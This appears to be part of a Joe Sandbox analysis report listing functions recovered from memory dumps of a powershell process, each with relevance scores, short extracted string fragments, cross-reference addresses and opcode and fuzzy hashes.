Function 0799D2B6 Relevance: 43.7, Strings: 34, Instructions: 1234COMMON

Download Yara Rule

Strings

tLgk, xrefs: 0799D66D
x.fk, xrefs: 0799D1CC
(ful, xrefs: 0799CB41
(ful, xrefs: 0799D691
(ful, xrefs: 0799D319
(ful, xrefs: 0799BFE1
(ful, xrefs: 0799C93D
tLgk, xrefs: 0799C984
(ful, xrefs: 0799C30D
4']q, xrefs: 0799C11A
(ful, xrefs: 0799CCD6
(ful, xrefs: 0799D5C2
4']q, xrefs: 0799CEB0
-fk, xrefs: 0799D21D
(ful, xrefs: 0799C9A6
x.fk, xrefs: 0799C3F1
(ful, xrefs: 0799C8DE
(ful, xrefs: 0799CAF0
(ful, xrefs: 0799CBDD
(ful, xrefs: 0799CC78
(ful, xrefs: 0799CF67
(ful, xrefs: 0799D058
(ful, xrefs: 0799BF11
(ful, xrefs: 0799D3B9
tLgk, xrefs: 0799BDFB
(ful, xrefs: 0799CFFD
tLgk, xrefs: 0799BEF1
(ful, xrefs: 0799D623
(ful, xrefs: 0799BE1B
(ful, xrefs: 0799C870
-fk, xrefs: 0799C43F
(ful, xrefs: 0799C2A7
4']q, xrefs: 0799C1BE
(ful, xrefs: 0799D40C

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4']q$4']q$4']q$tLgk$tLgk$tLgk$tLgk$x.fk$x.fk$-fk$-fk
API String ID: 0-4209968662
Opcode ID: dc890e44e8bcd56b1fb609af70af64a89cbce64c72f360bf58dbb42298ca9196
Instruction ID: edfa340cdd1e7a1e8e860f3c05ab66d15f89a8d4b4bb2f37cee76d21aed27604
Opcode Fuzzy Hash: dc890e44e8bcd56b1fb609af70af64a89cbce64c72f360bf58dbb42298ca9196
Instruction Fuzzy Hash: 2EC295B4B002149FDB64DB68C990BEAB7B7EF89304F1085A9D5096B781CB35ED81CF91

Function 07994DF0 Relevance: 33.6, Strings: 26, Instructions: 1118COMMON

Download Yara Rule

Strings

4']q, xrefs: 07994FA6
4']q, xrefs: 0799555B
4']q, xrefs: 0799504E
4']q, xrefs: 07995042
4']q, xrefs: 0799575F
4']q, xrefs: 07995192
(ful, xrefs: 07995DCA
4']q, xrefs: 079950F6
4']q, xrefs: 07995753
4']q, xrefs: 0799519E
4']q, xrefs: 07995603
4']q, xrefs: 07995567
4']q, xrefs: 079954BC
4']q, xrefs: 079954B0
4']q, xrefs: 07995249
4']q, xrefs: 079950EA
4']q, xrefs: 0799523D
(ful, xrefs: 07995DD4
4']q, xrefs: 079952E5
4']q, xrefs: 079956AB
4']q, xrefs: 0799560F
4']q, xrefs: 079952F1
4']q, xrefs: 07994EFE
4']q, xrefs: 07994EF2
4']q, xrefs: 079956B7
4']q, xrefs: 07994F9A

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: (ful$(ful$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
API String ID: 0-3982414120
Opcode ID: 9dd9efc7c3c6c2df16ebc4c9a7732a8e2ecde50c9a9217a65523531937a691e5
Instruction ID: cc0c0fae7c4c45d020c4de213bb3dd192e09303532a0167480a086c9593c78e4
Opcode Fuzzy Hash: 9dd9efc7c3c6c2df16ebc4c9a7732a8e2ecde50c9a9217a65523531937a691e5
Instruction Fuzzy Hash: D6A29EB0B00205DFEB24CFACC551BAABBA2FB48704F218569D9056B796CB729D41CF91

Function 07993F9A Relevance: 33.4, Strings: 26, Instructions: 888COMMON

Download Yara Rule

Strings

(ful, xrefs: 0799397E
(ful, xrefs: 0799434B
4']q, xrefs: 07993B82
tLgk, xrefs: 07994414
x.fk, xrefs: 07993EAC
(ful, xrefs: 079935BF
(ful, xrefs: 079943D4
(ful, xrefs: 07993D60
(ful, xrefs: 07993554
tLgk, xrefs: 0799360A
(ful, xrefs: 079937E2
(ful, xrefs: 079943CA
-fk, xrefs: 07993EFD
(ful, xrefs: 079942E1
(ful, xrefs: 07993636
(ful, xrefs: 0799387C
(ful, xrefs: 079942EF
(ful, xrefs: 0799433F
(ful, xrefs: 0799409B
(ful, xrefs: 07993922
(ful, xrefs: 07993C31
(ful, xrefs: 079934EA
(ful, xrefs: 07993D0B
(ful, xrefs: 07993FF7
(ful, xrefs: 0799378A
(ful, xrefs: 079940F5

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4']q$tLgk$tLgk$x.fk$-fk
API String ID: 0-769029024
Opcode ID: e53576b647ca3d6c2799113300334ab92d7f917a9280557b2a8a5be4d692cb8b
Instruction ID: 98dcfdd0dc1ae665893a9c9445a067a1d52f74047dc2fc90dc38462203adc495
Opcode Fuzzy Hash: e53576b647ca3d6c2799113300334ab92d7f917a9280557b2a8a5be4d692cb8b
Instruction Fuzzy Hash: DF8274B4A00214DFEB24DF58C951BABB7B6EF84304F50C8A9D90A6B751CB71AD81CF91

Function 07993340 Relevance: 25.8, Strings: 20, Instructions: 787COMMON

Download Yara Rule

Strings

4']q, xrefs: 07993B8E
(ful, xrefs: 07993636
(ful, xrefs: 0799397E
(ful, xrefs: 0799387C
4']q, xrefs: 07993B82
(ful, xrefs: 079933AC
x.fk, xrefs: 07993EAC
(ful, xrefs: 079935BF
(ful, xrefs: 07993922
(ful, xrefs: 07993C31
(ful, xrefs: 07993D0B
(ful, xrefs: 079934EA
(ful, xrefs: 07993D60
(ful, xrefs: 07993554
(ful, xrefs: 079933B6
tLgk, xrefs: 0799360A
(ful, xrefs: 079937E2
(ful, xrefs: 07993C3B
(ful, xrefs: 0799378A
-fk, xrefs: 07993EFD

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4']q$4']q$tLgk$x.fk$-fk
API String ID: 0-3683346509
Opcode ID: 160fc2b95050a13c438045f70f90c149e175a973ce2c62fbe8ba6959c59e950d
Instruction ID: 68faa8e31bb7f8244bb7ac40b97836ae39faf22235a48db89c95235fb2b45509
Opcode Fuzzy Hash: 160fc2b95050a13c438045f70f90c149e175a973ce2c62fbe8ba6959c59e950d
Instruction Fuzzy Hash: 397281B4A00214DFEB24DF58C951BAAB7B6EF84304F50C8A9D90A6B745CF71AD81CF91

Function 07994166 Relevance: 20.6, Strings: 16, Instructions: 647COMMON

Download Yara Rule

Strings

(ful, xrefs: 07993636
(ful, xrefs: 0799397E
(ful, xrefs: 0799387C
4']q, xrefs: 07993B82
x.fk, xrefs: 07993EAC
(ful, xrefs: 079935BF
(ful, xrefs: 07993922
(ful, xrefs: 07993C31
(ful, xrefs: 07993D0B
(ful, xrefs: 079934EA
(ful, xrefs: 07993D60
(ful, xrefs: 07993554
tLgk, xrefs: 0799360A
(ful, xrefs: 079937E2
(ful, xrefs: 0799378A
-fk, xrefs: 07993EFD

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4']q$tLgk$x.fk$-fk
API String ID: 0-800970596
Opcode ID: 698bb253f50062991990e3b5839e7c64a54aaf8ca6df298663eb7efab5dfd48e
Instruction ID: f65f4654e540db05003e1be90dea6fa2b8964feac07b8eca1d21e1d449277c1b
Opcode Fuzzy Hash: 698bb253f50062991990e3b5839e7c64a54aaf8ca6df298663eb7efab5dfd48e
Instruction Fuzzy Hash: D95273B4A00214DFEB24DF58C951BAAB7B2EF84304F50C9A9D90A6B751CB71ED81CF91

Function 0799D477 Relevance: 20.6, Strings: 16, Instructions: 626COMMON

Download Yara Rule

Strings

x.fk, xrefs: 0799D1CC
(ful, xrefs: 0799CB41
(ful, xrefs: 0799CFFD
(ful, xrefs: 0799C93D
tLgk, xrefs: 0799C984
(ful, xrefs: 0799CCD6
-fk, xrefs: 0799D21D
4']q, xrefs: 0799CEB0
(ful, xrefs: 0799C9A6
(ful, xrefs: 0799C8DE
(ful, xrefs: 0799C870
(ful, xrefs: 0799CAF0
(ful, xrefs: 0799CBDD
(ful, xrefs: 0799CC78
(ful, xrefs: 0799CF67
(ful, xrefs: 0799D058

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4']q$tLgk$x.fk$-fk
API String ID: 0-800970596
Opcode ID: c8b4a0249b9e16ef46737884ffaf68129b65e795db51ac9d6657d02e08ff3763
Instruction ID: 2a734899bb2a2c13abc3a4237af8154c7a1a8a49a8c01cd74c90cf18de0bdd8c
Opcode Fuzzy Hash: c8b4a0249b9e16ef46737884ffaf68129b65e795db51ac9d6657d02e08ff3763
Instruction Fuzzy Hash: 554282F4B002149FDB64DB58CA90BAAB7B7EF89304F1085A9D5096B781DB32ED81CF51

Function 07994DD2 Relevance: 15.9, Strings: 12, Instructions: 912COMMON

Download Yara Rule

Strings

4']q, xrefs: 0799555B
4']q, xrefs: 079952E5
4']q, xrefs: 079956AB
4']q, xrefs: 07995603
4']q, xrefs: 079954B0
4']q, xrefs: 07995192
4']q, xrefs: 0799523D
4']q, xrefs: 079950EA
4']q, xrefs: 07995042
4']q, xrefs: 07995753
4']q, xrefs: 07994EF2
4']q, xrefs: 07994F9A

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
API String ID: 0-958751914
Opcode ID: 51ffbe42d6a930613b8f1231ea9e00dca8eac68e6179c5d2449532c5182f95d7
Instruction ID: 6e596800acb8d104493e6bc5b45c6f567818bba46685e469b58fb89523079db7
Opcode Fuzzy Hash: 51ffbe42d6a930613b8f1231ea9e00dca8eac68e6179c5d2449532c5182f95d7
Instruction Fuzzy Hash: DC8292B0B01205DFEB21CFA8C551BAABBB2FB48704F218569D9056F782CB729D51CF91

Function 0799D70C Relevance: 11.7, Strings: 9, Instructions: 435COMMON

Download Yara Rule

Strings

tLgk, xrefs: 0799D8FA
4']q, xrefs: 0799D981
x.fk, xrefs: 0799DEB5
(ful, xrefs: 0799D894
(ful, xrefs: 0799DA8C
(ful, xrefs: 0799D786
(ful, xrefs: 0799DD98
4rl, xrefs: 0799D7D4
(ful, xrefs: 0799DC26

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: (ful$(ful$(ful$(ful$(ful$4']q$4rl$tLgk$x.fk
API String ID: 0-3965685729
Opcode ID: 0f1a2f6a28a91a4e164ab1837eb51686616fdaa356799cb4ae2eefbb085ba666
Instruction ID: 4005349954ee4ea1598c85608dfc2cf43c7e2516f1f982c44969135484b5fea3
Opcode Fuzzy Hash: 0f1a2f6a28a91a4e164ab1837eb51686616fdaa356799cb4ae2eefbb085ba666
Instruction Fuzzy Hash: 34122AB4B04215DFEB24DB28C980BA9B7B6FB45308F0088E9D509AB751DB71EE81CF51

Function 0799D501 Relevance: 11.7, Strings: 9, Instructions: 431COMMON

Download Yara Rule

Strings

tLgk, xrefs: 0799D8FA
4']q, xrefs: 0799D981
x.fk, xrefs: 0799DEB5
(ful, xrefs: 0799D894
(ful, xrefs: 0799DA8C
(ful, xrefs: 0799D786
(ful, xrefs: 0799DD98
4rl, xrefs: 0799D7D4
(ful, xrefs: 0799DC26

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: (ful$(ful$(ful$(ful$(ful$4']q$4rl$tLgk$x.fk
API String ID: 0-3965685729
Opcode ID: 253ced9447bd1f8e5e5494d7533a45384c791cdc3f59a1d2b6ffe56fb5ec2fa9
Instruction ID: 6c065d178a3695c1411020ab257e260cabcc1ad3b90bc7f1c275223ce7f3e612
Opcode Fuzzy Hash: 253ced9447bd1f8e5e5494d7533a45384c791cdc3f59a1d2b6ffe56fb5ec2fa9
Instruction Fuzzy Hash: 47121BB4B04215DFEB64DB18C980BA9B7B6FB49308F0088E9D509AB750DB71EE81CF51

Function 079944D8 Relevance: 10.4, Strings: 8, Instructions: 373COMMON

Download Yara Rule

Strings

-fk, xrefs: 079948F1
4']q, xrefs: 079947ED
x.fk, xrefs: 079948AC
(ful, xrefs: 079945F9
4']q, xrefs: 0799486C
4']q, xrefs: 079947E1
4']q, xrefs: 07994860
(ful, xrefs: 07994603

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: (ful$(ful$4']q$4']q$4']q$4']q$x.fk$-fk
API String ID: 0-1086513769
Opcode ID: a9af97f79d0960b64bd3f1ba8a5cb1e68f234ab234a0aac0f8ab995856e8e4bb
Instruction ID: 8808b9ecb29b4e8dffd9bacbaafe3041b144ee385f05158cdc6589df5b597f17
Opcode Fuzzy Hash: a9af97f79d0960b64bd3f1ba8a5cb1e68f234ab234a0aac0f8ab995856e8e4bb
Instruction Fuzzy Hash: 45E1B0B0B002489FDB15DB6CC551BAEBBA6EF88308F508469D4046F365CF76EC56CB91

Function 079944B2 Relevance: 6.6, Strings: 5, Instructions: 315COMMON

Download Yara Rule

Strings

-fk, xrefs: 079948F1
x.fk, xrefs: 079948AC
(ful, xrefs: 079945F9
4']q, xrefs: 079947E1
4']q, xrefs: 07994860

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: (ful$4']q$4']q$x.fk$-fk
API String ID: 0-3139061712
Opcode ID: d3fb5c174ec3ef631cb8bf351c159bbcbf8285757dd9e02ce8b3c23f17b29da0
Instruction ID: cc8a324faa8bca77318e7f913877b9cf4cbefad23a360c94f760ff643f629d0e
Opcode Fuzzy Hash: d3fb5c174ec3ef631cb8bf351c159bbcbf8285757dd9e02ce8b3c23f17b29da0
Instruction Fuzzy Hash: 0FC1BDF0A002459FDB15CF58C540BAEBBB6AF89308F54C469D8046F3A5CB76EC56CB91

Function 07990778 Relevance: 6.5, Strings: 5, Instructions: 232COMMON

Download Yara Rule

Strings

$]q, xrefs: 079907E7
4']q, xrefs: 0799080C
4']q, xrefs: 07990818
$]q, xrefs: 079907CB
$]q, xrefs: 079907F3

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q$$]q
API String ID: 0-2353078639
Opcode ID: ced91efcf9216a9e0f007059f1ad855cc4c9bbe7b1544f31227b2f285a720c2a
Instruction ID: 1dd65fd4ef56f8798347b5af3e0cc1c4dddc4da578f361e7aff22f7f37535b7a
Opcode Fuzzy Hash: ced91efcf9216a9e0f007059f1ad855cc4c9bbe7b1544f31227b2f285a720c2a
Instruction Fuzzy Hash: 927128B1B002178FEF149B7D88002BABBA9EF85615F14887AC865CB351DA36C951C7E1

Function 07994B30 Relevance: 5.2, Strings: 4, Instructions: 192COMMON

Download Yara Rule

Strings

(ful, xrefs: 07994C31
(ful, xrefs: 07994C27
(ful, xrefs: 07994CAF
(ful, xrefs: 07994CA5

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: (ful$(ful$(ful$(ful
API String ID: 0-100295639
Opcode ID: f551ffafa8961fbfca23a37d97138dadc8449182121235f1891717a2916f1c9b
Instruction ID: 9b2f653039f3cdf10814be78895ffe6ddf59d206c5ceaf921e347d86abee1283
Opcode Fuzzy Hash: f551ffafa8961fbfca23a37d97138dadc8449182121235f1891717a2916f1c9b
Instruction Fuzzy Hash: A071BFB4A00105DFEB15CF5CC951AAABBF6EF88314F148569D804AB764DB32EC42CB91

Function 04E5AFE8 Relevance: 4.3, Strings: 3, Instructions: 518COMMON

Download Yara Rule

Strings

$]q, xrefs: 04E5B202
$]q, xrefs: 04E5B567
Haq, xrefs: 04E5B0AE

Memory Dump Source

Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd

Similarity

API ID:
String ID: Haq$$]q$$]q
API String ID: 0-1533201563
Opcode ID: 407a2f57a676922a539212044cc148f51f50dc9a4df289de0dc897fd6c5fec59
Instruction ID: e6eaef47df637be346e6f96351bd9eb328ad73c8ae4bba0f7adecd4dd33be1a6
Opcode Fuzzy Hash: 407a2f57a676922a539212044cc148f51f50dc9a4df289de0dc897fd6c5fec59
Instruction Fuzzy Hash: 35223334B002189FCB29DB24D8547ADBBB6BF89304F1444A9D909AB361DF35AD85CF91

Function 07991040 Relevance: 3.0, Strings: 2, Instructions: 500COMMON

Download Yara Rule

Strings

tP]q, xrefs: 079910D7
tP]q, xrefs: 079910CB

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: tP]q$tP]q
API String ID: 0-145478062
Opcode ID: 838cc7d6d7c9333b25b053482b0c5d1b6e846f13b812d26dc64f6937f6fb3b6f
Instruction ID: 3300d7e254e0e749e7bf7d55ade25f54c25facd5e5b7b38f20fb0d66639d8cef
Opcode Fuzzy Hash: 838cc7d6d7c9333b25b053482b0c5d1b6e846f13b812d26dc64f6937f6fb3b6f
Instruction Fuzzy Hash: 741280B0B4020A9FEB14DB9CC541AAABBF6FF85314F14C469E9099B355CB72DC42CB91

Function 04E5EACE Relevance: 2.8, Strings: 2, Instructions: 278COMMON

Download Yara Rule

Strings

/ y, xrefs: 04E5EB17
/ y, xrefs: 04E5EAF7

Memory Dump Source

Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd

Similarity

API ID:
String ID: / y$/ y
API String ID: 0-3043203095
Opcode ID: 3c5649f2a9d8ad11a74229c067517c14e9113f8df04f0f60d0f5f96571c35c62
Instruction ID: 7e4db11d4dbb8f4beecd520cb1b51ed930907be1a0c79ffd4ccac6d6a57c3b6c
Opcode Fuzzy Hash: 3c5649f2a9d8ad11a74229c067517c14e9113f8df04f0f60d0f5f96571c35c62
Instruction Fuzzy Hash: 95B16E70E00259DFDF14CFACC9857DDBBF2AF88318F149129E815AB264EB34A941CB81

Function 04E5F3A6 Relevance: 2.8, Strings: 2, Instructions: 259COMMON

Download Yara Rule

Strings

/ y, xrefs: 04E5F3C7
/ y, xrefs: 04E5F3E7

Memory Dump Source

Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd

Similarity

API ID:
String ID: / y$/ y
API String ID: 0-3043203095
Opcode ID: b89002c61d6961c96181659d948ae3686603b47bb7cf5836636957cf6c0f7073
Instruction ID: 8b0697b5252721f9fb6e33fd84575b3f15dd951c5e0cb6b5c7c53bb3d808958c
Opcode Fuzzy Hash: b89002c61d6961c96181659d948ae3686603b47bb7cf5836636957cf6c0f7073
Instruction Fuzzy Hash: 51A15070E00219DFDF10CFA8D9857DDBBF1AF88318F249529D819E7264EB74A845CB85

Function 07994B0E Relevance: 2.7, Strings: 2, Instructions: 175COMMON

Download Yara Rule

Strings

(ful, xrefs: 07994C27
(ful, xrefs: 07994CA5

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: (ful$(ful
API String ID: 0-51623107
Opcode ID: b916a7e852b7b19cec5f5592fb3e1e6af78eea77e32cbf001a7b954ee2604bc1
Instruction ID: c83089e53bfe3db6e8e32b9dd8be225ed31520cbef3b56d23d11ced6fbdbd470
Opcode Fuzzy Hash: b916a7e852b7b19cec5f5592fb3e1e6af78eea77e32cbf001a7b954ee2604bc1
Instruction Fuzzy Hash: E261B1B4A00245DFEB16CF5CC581AAABBB6FF49318F1485AAD4046B725CB32E852CF51

Function 07990A80 Relevance: 2.7, Strings: 2, Instructions: 172COMMON

Download Yara Rule

Strings

tP]q, xrefs: 07990B30
tP]q, xrefs: 07990B24

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID: tP]q$tP]q
API String ID: 0-145478062
Opcode ID: 5d9b56d98e049b80cf6b66781e6f3e0e0bef4585db998faa59982958a069a713
Instruction ID: 03047203634621bc1646ac4b668990e808514d0732653aeff952defffb820561
Opcode Fuzzy Hash: 5d9b56d98e049b80cf6b66781e6f3e0e0bef4585db998faa59982958a069a713
Instruction Fuzzy Hash: 45517A717043579FEF254A6DC840766BBEAAFC2319F18C47BD559CB291DA71C840C3A1

Function 04E572A0 Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5c67ccb45a22bf40dcc2aee7de83ad68f3aa1b0e3ad0cd8585cfd309c317732
Instruction ID: 73fedf70a3c9320b4587d0b05068f750828aabf23eb90facea7c9c341ca6e3f7
Opcode Fuzzy Hash: e5c67ccb45a22bf40dcc2aee7de83ad68f3aa1b0e3ad0cd8585cfd309c317732
Instruction Fuzzy Hash: 14C1AD35A00208CFCB14DFA4D944AADBBF6FF84314F158569E806AB364DB74ED59CB80

Function 04E52AA0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c80de31e5f47afd95fed6034956bc15a7f8084f709432845484153afb5fde7c3
Instruction ID: 0c0b7a6694bbb22c7fee4700c0275ec77be2eea5bad23f1ee3a088b5728c7635
Opcode Fuzzy Hash: c80de31e5f47afd95fed6034956bc15a7f8084f709432845484153afb5fde7c3
Instruction Fuzzy Hash: 4C918B74A002098FCB05CF58C5D49AEBBB1FF89314B25899AD945AB3A5C732FC51CFA0

Function 04E57A68 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec1e8dd0dd9ba217c8a6cefbc783eb5b21cb391a6a8a45319d5ad4ee99d5db10
Instruction ID: 98ffb3b820f6d2e53fbfc1a6dbc071ad64ca77b280b7a6789b36635e445987fe
Opcode Fuzzy Hash: ec1e8dd0dd9ba217c8a6cefbc783eb5b21cb391a6a8a45319d5ad4ee99d5db10
Instruction Fuzzy Hash: 5171AC30A002498FCB14DF68C880A9EBBF6FF89314F14856ED4599B261EB75AC46CB90

Function 04E57BD6 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f721d4f62e33fe9d8509bc41e54d6582ba053d41f5ade3e07e4ee93ab75ea684
Instruction ID: 7418c0853f11161b83a3c7e075d4b82da1f1499f6e50714765643e22e64faf45
Opcode Fuzzy Hash: f721d4f62e33fe9d8509bc41e54d6582ba053d41f5ade3e07e4ee93ab75ea684
Instruction Fuzzy Hash: E4714C71A00209DFDB18DFA4D444BADBBF6FF88308F148529D816AB360DB35AD56CB51

Function 07998495 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffbf581393cbd2c7b4ea1260866f1255e557943c13ca4996af53eb781faa8309
Instruction ID: 7ef7d3d1e710db222d9f2c1aac7c0db2ba797c63b783df76290e73274855d7f2
Opcode Fuzzy Hash: ffbf581393cbd2c7b4ea1260866f1255e557943c13ca4996af53eb781faa8309
Instruction Fuzzy Hash: F54178F2700100ABDF24977C9511AADBB9ADFD3219B1088FEC9019B251CE32D919C3A2

Function 04E57A53 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59adfb4c803d52feed6374cf83fb37c7ceadef8849fece589d698073bd54e6f5
Instruction ID: 848fc353c82fbe23b1750fcbe7066957805af4179af654f7abd68d85a099688a
Opcode Fuzzy Hash: 59adfb4c803d52feed6374cf83fb37c7ceadef8849fece589d698073bd54e6f5
Instruction Fuzzy Hash: CC418C70A00218CFDB18DFA5D844AADBBB2FF88344F14846DD406AB7A5DB74AD45CB91

Function 04E52BB0 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be76f020e8a85db835b42fd22493eb234780d4a0c127eb3dc9eabe992c7f603b
Instruction ID: 21ee580dcf174c6262f2d2bea401ef250b42af4c821f97c9279136660e51d998
Opcode Fuzzy Hash: be76f020e8a85db835b42fd22493eb234780d4a0c127eb3dc9eabe992c7f603b
Instruction Fuzzy Hash: 5D414874A006099FCB09CF58C1D49AAFBB1FF48314B1585A9D945AB365C732FC91CFA4

Function 07990DE8 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 536a265a5c4b4369eb1bbe987d1a1ce9d156147406e48aec4905ff6b23e4c3de
